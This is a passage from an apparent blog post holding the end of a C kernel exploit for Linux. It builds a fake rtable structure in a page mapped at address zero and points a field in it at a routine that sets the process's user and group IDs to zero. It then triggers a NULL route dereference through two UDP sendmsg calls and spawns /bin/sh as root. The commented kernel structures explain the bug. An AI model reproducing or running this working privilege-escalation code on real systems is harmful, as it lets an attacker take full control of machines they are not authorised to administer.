    *         int                     (*input)(struct sk_buff*);
    *         int                     (*output)(struct sk_buff*);
    *
    * #ifdef CONFIG_NET_CLS_ROUTE
    *         __u32                   tclassid;
    * #endif
    *
    *         struct  dst_ops         *ops;
    *         struct rcu_head         rcu_head;
    *
    *         char                    info[0];
    * };
    *
    * struct rtable
    * {
    *         union
    *         {
    *                 struct dst_entry        dst;
    *                 struct rtable           *rt_next;
    *         } u;
    *
    *         struct in_device        *idev;
    *
    *         unsigned                rt_flags;
    *         __u16                   rt_type;
    *         __u16                   rt_multipath_alg;
    *
    *         __be32                  rt_dst; * Path destination     *
    *         __be32                  rt_src; * Path source          *
    *         int                     rt_iif;
    *
    *         * Info on neighbour *
    *         __be32                  rt_gateway;
    *
    *         * Cache lookup keys *
    *         struct flowi            fl;
    *
    *         * Miscellaneous cached information *
    *          __be32                  rt_spec_dst; * RFC1122 specific destination *
    *         struct inet_peer        *peer; * long-living peer info *
    * };
    *
    */
   rtable = mmap(0, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
   if (rtable == MAP_FAILED) {
      fprintf(stderr, "[*] mmap failed\n");
      exit(-1);
   }
   *(int *)(rtable + 0×74) = (int)set_current_task_uids_gids_to_zero;

   /* trigger exploit
    *
    * the second sendmsg() call will call ip_append_data() with rt == NULL
    * because of:
    * if (up->pending) {
    *          *
    *          * There are pending frames.
    *          * The socket lock must be held while it’s corked.
    *          *
    *          lock_sock(sk);
    *          if (likely(up->pending)) {
    *                    if (unlikely(up->pending != AF_INET)) {
    *                            release_sock(sk);
    *                            return -EINVAL;
    *                    }
    *                    goto do_append_data;
    *            }
    *            release_sock(sk);
    *    }
    *
    */
   sendmsg(s, &header, MSG_MORE|MSG_PROXY);
   sendmsg(s, &header, 0);

   close(s);

   system("/bin/sh");

   return 0;
}

Tagged with:
Previous Entries
preload preload preload